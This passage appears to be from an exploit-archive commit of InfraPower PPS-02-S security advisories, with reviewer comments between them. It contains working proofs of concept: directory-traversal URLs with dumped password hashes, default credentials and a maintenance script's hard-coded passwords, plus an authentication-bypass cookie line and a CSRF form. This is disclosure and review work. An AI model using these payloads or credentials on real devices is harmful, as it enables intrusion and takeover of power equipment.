bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh


http://192.168.0.17/ListFile.php?file=../../../../../../../etc/web_conf

LoginAuth 1
|
||||||
|
UserName 00000000
|
||||||
|
Password 00000000
|
||||||
|
|
||||||
|
|
||||||
|
http://192.168.0.17/ListFile.php?file=../../../../../../../mnt/mtd/password_conf
|
||||||
|
|
||||||
|
dmin 999999
|
||||||
|
manager 666666
|
||||||
|
user 111111
|
||||||
|
|
||||||
|
|
||||||
|
http://192.168.0.17/ListFile.php?file=../../../../../../../sbin/maintenance_shell.sh
|
||||||
|
|
||||||
|
#!/bin/sh
|
||||||
|
echo -n "Please enter maintenance password:"
|
||||||
|
read -s pass
|
||||||
|
InfraType=`cat /mnt/mtd/main_conf | grep "InfraType" | cut -d " " -f 2`
|
||||||
|
if [ "$InfraType" == "1" ]; then
|
||||||
|
if [ "$pass" != "InfraSolution" ]; then
|
||||||
|
echo "Invalid maintenance password!"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
if [ "$InfraType" == "2" ]; then
|
||||||
|
if [ "$pass" != "InfraGuard" ]; then
|
||||||
|
echo "Invalid maintenance password!"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
if [ "$InfraType" == "3" ]; then
|
||||||
|
if [ "$pass" != "InfraPower" ]; then
|
||||||
|
echo "Invalid maintenance password!"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
if [ "$InfraType" == "4" ]; then
|
||||||
|
if [ "$pass" != "InfraCool" ]; then
|
||||||
|
echo "Invalid maintenance password!"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
#---emergency recovery mode
|
||||||
|
echo "DEBUG su mode started!"
|
||||||
|
su
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
# create menu
|
||||||
|
echo ""
|
||||||
|
echo "***********************************************"
|
||||||
|
echo "* Maintenance Menu *"
|
||||||
|
echo "***********************************************"
|
||||||
|
echo "(1) View(vi) /mnt/mtd/main_conf "
|
||||||
|
echo "(2) View /mnt/mtd/snmp_conf "
|
||||||
|
echo "(3) View /mnt/mtd/net_conf "
|
||||||
|
echo "(4) View /mnt/mtd/web_conf "
|
||||||
|
echo "(5) Enable auto patching(boot.sh) on bootup "
|
||||||
|
echo "(6) Disable auto patching(boot.sh) on bootup "
|
||||||
|
echo "(7) Clear all patching (/mnt/mtd/patch/) "
|
||||||
|
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
|
||||||
|
echo "(9) Process Monitoring "
|
||||||
|
echo "(A) Patch SNMP "
|
||||||
|
echo "(B) Restore Configuration "
|
||||||
|
echo "(P) Restore INI, POL profiles "
|
||||||
|
echo "(E) Execute command line "
|
||||||
|
echo "(M) View meminfo "
|
||||||
|
echo "(X) Terminal console mode "
|
||||||
|
echo "(R) Reboot "
|
||||||
|
echo "(?) This menu "
|
||||||
|
echo "(Q) Exit "
|
||||||
|
echo "***********************************************"
|
||||||
|
while true; do
|
||||||
|
echo -n "Input Maintenance menu item number(? for help):"
|
||||||
|
read y
|
||||||
|
case $y in
|
||||||
|
"?")
|
||||||
|
echo ""
|
||||||
|
echo "***********************************************"
|
||||||
|
echo "* Maintenance Menu *"
|
||||||
|
echo "***********************************************"
|
||||||
|
echo "(1) View(vi) /mnt/mtd/main_conf "
|
||||||
|
echo "(2) View /mnt/mtd/snmp_conf "
|
||||||
|
echo "(3) View /mnt/mtd/net_conf "
|
||||||
|
echo "(4) View /mnt/mtd/web_conf "
|
||||||
|
echo "(5) Enable auto patching(boot.sh) on bootup "
|
||||||
|
echo "(6) Disable auto patching(boot.sh) on bootup "
|
||||||
|
echo "(7) Clear all patching (/mnt/mtd/patch/) "
|
||||||
|
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
|
||||||
|
echo "(9) Process Monitoring "
|
||||||
|
echo "(A) Patch SNMP "
|
||||||
|
echo "(B) Restore Configuration "
|
||||||
|
echo "(P) Restore INI, POL profiles "
|
||||||
|
echo "(E) Execute command line "
|
||||||
|
echo "(M) View meminfo "
|
||||||
|
echo "(X) Terminal console mode "
|
||||||
|
echo "(R) Reboot "
|
||||||
|
echo "(?) This menu "
|
||||||
|
echo "(Q) Exit "
|
||||||
|
echo "***********************************************"
|
||||||
|
;;
|
||||||
|
"1")
|
||||||
|
echo "****/mnt/mtd/main_conf******************************"
|
||||||
|
vi /mnt/mtd/main_conf
|
||||||
|
echo "****************************************************"
|
||||||
|
;;
|
||||||
|
"2")
|
||||||
|
echo "****/mnt/mtd/snmp_conf******************************"
|
||||||
|
cat /mnt/mtd/snmp_conf
|
||||||
|
echo "****************************************************"
|
||||||
|
;;
|
||||||
|
"3")
|
||||||
|
echo "****/mnt/mtd/net_conf*******************************"
|
||||||
|
cat /mnt/mtd/net_conf
|
||||||
|
echo "****************************************************"
|
||||||
|
;;
|
||||||
|
"4")
|
||||||
|
echo "****/mnt/mtd/web_conf*******************************"
|
||||||
|
cat /mnt/mtd/web_conf
|
||||||
|
echo "****************************************************"
|
||||||
|
;;
|
||||||
|
"5")
|
||||||
|
echo "(5) Enable auto patching(boot.sh) on bootup "
|
||||||
|
echo -n "Are you sure to continue? [y/n]:"
|
||||||
|
read ans5
|
||||||
|
if [ "$ans5" == "y" ]; then
|
||||||
|
if [ -f "/mnt/mtd/patch/mnt/mtd/boot.sh" ]; then
|
||||||
|
echo -n "Patching boot.sh ..."
|
||||||
|
cp /mnt/mtd/patch/mnt/mtd/boot.sh /mnt/mtd/boot.sh
|
||||||
|
chmod 777 /mnt/mtd/boot.sh
|
||||||
|
if [ -f "/mnt/mtd/boot.sh" ]; then
|
||||||
|
echo "...done"
|
||||||
|
else
|
||||||
|
echo "...fail"
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
echo "file not exist: /mnt/mtd/patch/boot.sh"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
"6")
|
||||||
|
echo "(6) Disable auto patching(boot.sh) on bootup "
|
||||||
|
echo -n "Are you sure to continue? [y/n]:"
|
||||||
|
read ans6
|
||||||
|
if [ "$ans6" == "y" ]; then
|
||||||
|
if [ -f "/mnt/mtd/boot.sh" ]; then
|
||||||
|
echo -n "Disabling boot.sh pacthing..."
|
||||||
|
rm /mnt/mtd/boot.sh
|
||||||
|
echo "...done"
|
||||||
|
else
|
||||||
|
echo "File not exist: /mnt/mtd/boot.sh"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
"7")
|
||||||
|
echo "(7) Clear /mnt/mtd/patch/ "
|
||||||
|
echo -n "Are you sure to continue? [y/n]:"
|
||||||
|
read ans7
|
||||||
|
if [ "$ans7" == "y" ]; then
|
||||||
|
echo -n " Removing patch files (/mnt/mtd/patch/*)..."
|
||||||
|
rm -r /mnt/mtd/patch/*
|
||||||
|
if [ ! -f "/mnt/mtd/patch/" ]; then
|
||||||
|
echo "...done"
|
||||||
|
echo -n "Reboot to apply changes? [y/n]:"
|
||||||
|
read ans7r
|
||||||
|
if [ "$ans7r" == "y" ]; then
|
||||||
|
echo "Rebooting..."
|
||||||
|
reboot
|
||||||
|
fi
|
||||||
|
|
||||||
|
else
|
||||||
|
echo "...fail"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
"8")
|
||||||
|
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
|
||||||
|
echo -n "Are you sure to continue? [y/n]:"
|
||||||
|
read ans8
|
||||||
|
if [ "$ans8" == "y" ]; then
|
||||||
|
if [ -f "/www/patch/patch_now.sh" ]; then
|
||||||
|
chmod 777 /www/patch/patch_now.sh
|
||||||
|
sh /www/patch/patch_now.sh
|
||||||
|
else
|
||||||
|
echo "file not exist: /www/patch/patch_now.sh"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
"9")
|
||||||
|
echo "****Process List*******************************"
|
||||||
|
ps
|
||||||
|
echo "***********************************************"
|
||||||
|
;;
|
||||||
|
"A")
|
||||||
|
echo "(A) Patch SNMP "
|
||||||
|
echo -n "Are you sure to continue? [y/n]:"
|
||||||
|
read ans8
|
||||||
|
if [ "$ans8" == "y" ]; then
|
||||||
|
if [ -f "/www/patch/snmplink.sh" ]; then
|
||||||
|
sh /www/patch/snmplink.sh
|
||||||
|
if [ -f "/www/snmplink.log" ]; then
|
||||||
|
cat /www/snmplink.log
|
||||||
|
fi
|
||||||
|
echo "Patching SNMP and its modules...done"
|
||||||
|
else
|
||||||
|
echo "file not exist: /www/patch/snmplink.sh"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
"B")
|
||||||
|
echo "(B) Restore Box Configuration(box_conf) "
|
||||||
|
echo -n "Are you sure to continue? [y/n]:"
|
||||||
|
read ans8
|
||||||
|
if [ "$ans8" == "y" ]; then
|
||||||
|
if [ -f "/etc/box_conf" ]; then
|
||||||
|
echo "Patching /mnt/mtd/box_conf..."
|
||||||
|
cp /etc/box_conf /mnt/mtd/box_conf
|
||||||
|
if [ -f "/mnt/mtd/box_conf" ]; then
|
||||||
|
echo "Patching /mnt/mtd/box_conf...done"
|
||||||
|
else
|
||||||
|
echo "Patching /mnt/mtd/box_conf...failed"
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
echo "file not exist: /etc/box_conf"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
"P")
|
||||||
|
INFRA_VER=`cat /etc/infratype_conf | grep "InfraType" | cut -d " " -f 2 | sed -e 's/^[ \t]*//' | sed -e 's/[ /t]*$//' | cut -d " " -f1`
|
||||||
|
echo "(P) Restore INI, POL profiles for $INFRA_VER "
|
||||||
|
echo -n "Are you sure to continue? [y/n]:"
|
||||||
|
read ansP
|
||||||
|
if [ "$ansP" == "y" ]; then
|
||||||
|
if [ "$InfraType" == "1" ]; then
|
||||||
|
echo "Restoring INI, POL profiles for $INFRA_VER..."
|
||||||
|
if [ -f "/etc/MF2_ini_$INFRA_VER" ]; then
|
||||||
|
echo -n "Found /etc/MF2_ini_$INFRA_VER, Restoring..."
|
||||||
|
cp /etc/MF2_ini_$INFRA_VER /mnt/mtd/MF2_ini
|
||||||
|
echo "...done"
|
||||||
|
fi
|
||||||
|
if [ -f "/etc/MF2_pol_$INFRA_VER" ]; then
|
||||||
|
echo -n "Found /etc/MF2_pol_$INFRA_VER, Restoring..."
|
||||||
|
cp /etc/MF2_pol_$INFRA_VER /mnt/mtd/MF2_pol
|
||||||
|
echo "...done"
|
||||||
|
fi
|
||||||
|
if [ -f "/etc/PDU3_ini_$INFRA_VER" ]; then
|
||||||
|
echo -n "Found /etc/PDU3_ini_$INFRA_VER, Restoring..."
|
||||||
|
cp /etc/PDU3_ini_$INFRA_VER /mnt/mtd/PDU3_ini
|
||||||
|
echo "...done"
|
||||||
|
fi
|
||||||
|
if [ -f "/etc/PDU3_pol_$INFRA_VER" ]; then
|
||||||
|
echo -n "Found /etc/PDU3_pol_$INFRA_VER, Restoring..."
|
||||||
|
cp /etc/PDU3_pol_$INFRA_VER /mnt/mtd/PDU3_pol
|
||||||
|
echo "...done"
|
||||||
|
fi
|
||||||
|
if [ -f "/etc/FAN2_ini_$INFRA_VER" ]; then
|
||||||
|
echo -n "Found /etc/FAN2_ini_$INFRA_VER, Restoring..."
|
||||||
|
cp /etc/FAN2_ini_$INFRA_VER /mnt/mtd/FAN2_ini
|
||||||
|
echo "...done"
|
||||||
|
fi
|
||||||
|
if [ -f "/etc/FAN2_pol_$INFRA_VER" ]; then
|
||||||
|
echo -n "Found /etc/FAN2_pol_$INFRA_VER, Restoring..."
|
||||||
|
cp /etc/FAN2_pol_$INFRA_VER /mnt/mtd/FAN2_pol
|
||||||
|
echo "...done"
|
||||||
|
fi
|
||||||
|
if [ -f "/etc/HANDLE3_ini_$INFRA_VER" ]; then
|
||||||
|
echo -n "Found /etc/HANDLE3_ini_$INFRA_VER, Restoring..."
|
||||||
|
cp /etc/HANDLE3_ini_$INFRA_VER /mnt/mtd/HANDLE3_ini
|
||||||
|
echo "...done"
|
||||||
|
fi
|
||||||
|
if [ -f "/etc/HANDLE3_pol_$INFRA_VER" ]; then
|
||||||
|
echo -n "Found /etc/HANDLE3_pol_$INFRA_VER, Restoring..."
|
||||||
|
cp /etc/HANDLE3_pol_$INFRA_VER /mnt/mtd/HANDLE3_pol
|
||||||
|
echo "...done"
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
"E")
|
||||||
|
echo -n "Input command line:"
|
||||||
|
read cmd_line
|
||||||
|
$cmd_line
|
||||||
|
;;
|
||||||
|
"M")
|
||||||
|
if [ -f "/mnt/mtd/log_memCheck.txt" ]; then
|
||||||
|
cat /mnt/mtd/log_memCheck.txt
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
"R")
|
||||||
|
echo "(R) Reboot "
|
||||||
|
echo -n "Are you sure to continue? [y/n]:"
|
||||||
|
read ansR
|
||||||
|
if [ "$ansR" == "y" ]; then
|
||||||
|
echo "Rebooting..."
|
||||||
|
reboot
|
||||||
|
fi
|
||||||
|
;;
|
||||||
|
"X")
|
||||||
|
echo "su mode started!"
|
||||||
|
su
|
||||||
|
;;
|
||||||
|
"Q")
|
||||||
|
echo "Leaving maintenance mode........OK"
|
||||||
|
exit 0
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
done
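Review bot: the Desc section undersells what the quoted code and output show and names no remediation. Lines 9-10 of ListFile.php concatenate $_GET['file'] straight onto '/ramdisk/' with no canonicalisation, and the four PoC requests read files well outside that directory (/etc/passwd, /etc/web_conf, /mnt/mtd/password_conf, /sbin/maintenance_shell.sh), so this is an arbitrary file read with the web server's privileges, not just disclosure of "local resources"; the fix to state is to resolve the path (realpath()) and reject anything that does not stay under /ramdisk/, or to accept a basename only. The disclosed content also carries findings the advisory never calls out and that deserve their own entries or at least a sentence under Desc: plaintext credentials in web_conf and password_conf; several /etc/passwd accounts sharing one hash, with service, www and www2 all at uid 0; and the maintenance script's per-InfraType hard-coded passwords, its fall-through to an unconditional su when InfraType is none of 1-4, and menu item "E", which executes whatever line is typed. Finally, "Fixed version: Q216V3" should say whether that firmware fixes the traversal in ListFile.php or only removes the exposed files.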
54
platforms/php/webapps/40644.txt
Executable file

@ -0,0 +1,54 @@

InfraPower PPS-02-S Q213V1 Insecure Direct Object Reference Authorization Bypass


Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)

Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.

Desc: Insecure Direct Object References occur when an application
provides direct access to objects based on user-supplied input. As
a result of this vulnerability attackers can bypass authorization
and access resources and functionalities in the system directly, for
example APIs, files, upload utilities, device settings, etc.

Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10


Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5373
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5373.php


27.09.2016

--


GET /ConnPort.php
GET /CSSSource.php
GET /dball.php
GET /doupgrate.php
GET /IPSettings.php
GET /ListFile.php
GET /Menu.php
GET /Ntp.php
GET /PDUDetails_Ajax_Details.php
GET /PDULog.php
GET /PortSettings.php
GET /production_test1.php ("backdoor")
GET /UploadEXE.php
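Review bot: the Desc is a generic definition of IDOR and the PoC is a bare list of thirteen GET paths, so the actual finding (which of these scripts are reachable without a session) cannot be verified from the text. For each path the advisory should say what an unauthenticated request returns and that the script lacks the checkLogin() guard the rest of the application uses; the list includes firmware and upload handlers (/doupgrate.php, /UploadEXE.php) and /IPSettings.php, so the impact is configuration and firmware control, not merely reading "resources". The '("backdoor")' annotation on /production_test1.php is asserted without any supporting code or output and needs either evidence or a softer wording. Note also that /ListFile.php is already the subject of ZSL-2016-5370 in this same commit; the advisory should state whether it is listed here for the missing authentication check or double-counts the traversal. Remediation to state: apply the session check once at a common entry point instead of per script, so a newly added page cannot be forgotten.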
142
platforms/php/webapps/40645.txt
Executable file

@ -0,0 +1,142 @@

InfraPower PPS-02-S Q213V1 Authentication Bypass Vulnerability


Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)

Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.

Desc: The device does not properly perform authentication, allowing
it to be bypassed through cookie manipulation. The vulnerable function
checkLogin() in 'Function.php' checks only if the 'Login' Cookie is empty
or not, allowing easy bypass of the user security mechanisms.

Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10


Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5374
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5374.php


27.09.2016

--


(example) System.php:
---------------------
1: <?php
2:
3: require_once("Function.php");
4: session_start();
5: if(!checkLogin())
6: header('Location: Login.php');
7:

---------------------------------------
Function.php:
-------------
155: function checkLogin(){
156: if(empty($_SESSION['Login']))
157: return false;
158: return true;
159: }
160:


--------------------
'Sessioned' scripts:

➜ www grep -rHn 'session_start' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/Login.php:2: session_start();
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:2: session_start();
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:9: session_start();
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:3: session_start();
/Users/liwomac/Desktop/infrapower_files/www/System.php:4: session_start();
/Users/liwomac/Desktop/infrapower_files/www/User.php:3: session_start();

➜ www grep -rHn 'session_destroy' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Function.php:256: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/Function.php:266: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:7: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/System.php:53: session_destroy();
/Users/liwomac/Desktop/infrapower_files/www/System.php:63: session_destroy();

➜ www grep -rHn '$_SESSION' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Function.php:11: if(isset($_SESSION['ite'])){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:12: $this->init($_SESSION['ite']);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:156: if(empty($_SESSION['Login']))
/Users/liwomac/Desktop/infrapower_files/www/Function.php:233: if(!isset($_SESSION['TimeSync'])){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:234: $_SESSION['TimeSync'] = getConf("/mnt/mtd/main_conf", "TimeSyncPDU_opt");
/Users/liwomac/Desktop/infrapower_files/www/Function.php:235: if($_SESSION['TimeSync'] == "ON"){
/Users/liwomac/Desktop/infrapower_files/www/Function.php:237: $_SESSION['SyncDate'] = explode(":",$SyncDate);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:239: $_SESSION['TimeSync'] = "OFF";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:240: $_SESSION['SyncDate'][0] = "0";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:241: $_SESSION['SyncDate'][1] = "0";
/Users/liwomac/Desktop/infrapower_files/www/Function.php:255: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Function.php:265: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Login.php:31: $_SESSION['ite'] = substr($this->InfraType,1,1); // e.g."t3v3" get the second chr 3;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:64: $_SESSION['ite'] = "1";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:67: $_SESSION['ite'] = "2";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:70: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:73: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:76: $_SESSION['ite'] = "3";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:79: $_SESSION['ite'] = "4";
/Users/liwomac/Desktop/infrapower_files/www/Login.php:82: $_SESSION['ite'] = FALSE;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:91:$_SESSION['ite'] = $InfraType;
/Users/liwomac/Desktop/infrapower_files/www/Login.php:137: $_SESSION['Login'] = $_POST['ID_User'];
/Users/liwomac/Desktop/infrapower_files/www/Login.php:140: $_SESSION['Login'] = $_POST['ID_User'];
/Users/liwomac/Desktop/infrapower_files/www/Login.php:156: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
/Users/liwomac/Desktop/infrapower_files/www/Login.php:167: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") {
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:3: $_SESSION['Login'];
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:4: if (isset($_SESSION['Login'])){
/Users/liwomac/Desktop/infrapower_files/www/Logout.php:5: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/Menu.php:60: /*if ($_SESSION["SS_SystemCreated"] == "1") {
/Users/liwomac/Desktop/infrapower_files/www/System.php:52: unset($_SESSION['Login']);
/Users/liwomac/Desktop/infrapower_files/www/System.php:62: unset($_SESSION['Login']);

➜ www grep -rHn 'checkLogin' /Users/liwomac/Desktop/infrapower_files/www
/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/Function.php:155: function checkLogin(){
/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/Login.php:165: if(checkLogin()) {
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:10: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:4: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/System.php:5: if(!checkLogin())
/Users/liwomac/Desktop/infrapower_files/www/User.php:4: if(!checkLogin())


PoC:

javascript:document.cookie="Login=StrangerThings;expires=Sat, 09 Dec 2017 11:05:17 GMT"

--
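Review bot: the Desc attributes the bypass to the 'Login' Cookie, but the quoted code at Function.php:156 tests $_SESSION['Login'], a server-side session value that Login.php:137 and :140 populate from $_POST['ID_User'] after a login attempt; none of the grep output shows a request cookie named Login being copied into the session, so as presented the PoC (setting document.cookie="Login=StrangerThings") should not make checkLogin() return true. Either quote the code or PHP session configuration that lets the cookie reach $_SESSION['Login'], or restate the finding as what the code actually shows. Two points hold regardless and belong in the text as remediation: checkLogin() only tests emptiness, so any non-empty value passes and it should instead verify the stored identity against the user store on every request; and the guard is repeated per script (the checkLogin grep lists thirteen call sites), so it should be enforced centrally. A second PoC showing the exact request and the authenticated response would let this be verified from the advisory alone.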
53
platforms/php/webapps/40646.txt
Executable file

@ -0,0 +1,53 @@

InfraPower PPS-02-S Q213V1 Cross-Site Request Forgery


Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)

Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.

Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with admin
privileges if a logged-in user visits a malicious web site.

Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10


Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5375
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5375.php


27.09.2016

--


PoC:

<html>
<body>
<form action="http://192.168.0.17/SNMP.php?Menu=SMP" method="POST">
<input type="hidden" name="SNMPAgent" value="Enable" />
<input type="hidden" name="CommuintyString" value="public" />
<input type="hidden" name="CommuintyWrite" value="private" />
<input type="hidden" name="TrapsVersion" value="v2Trap" />
<input type="hidden" name="IP" value="192.168.0.254" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
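Review bot: this advisory is missing the "Fixed version" line that the other three InfraPower advisories in this commit carry (Q216V3, Firmware: IPD-02-FW-v03); state whether the CSRF issue is fixed there or still open at publication. The impact sentence ("perform certain actions with admin privileges") should also be made concrete from the PoC itself: the forged POST to SNMP.php enables the SNMP agent and sets the read and write community strings and the trap destination address, so a victim's browser can be used to hand SNMP management of the PDU to an attacker-chosen community. Remediation to state: a per-session anti-CSRF token validated on the SNMP.php POST (and the other state-changing scripts) together with SameSite cookies; given ZSL-2016-5374, a session check alone does not help. Finally, confirm that 'CommuintyString' and 'CommuintyWrite' are the form's real field names and not typos in the PoC, since a reader reproducing this will copy them verbatim.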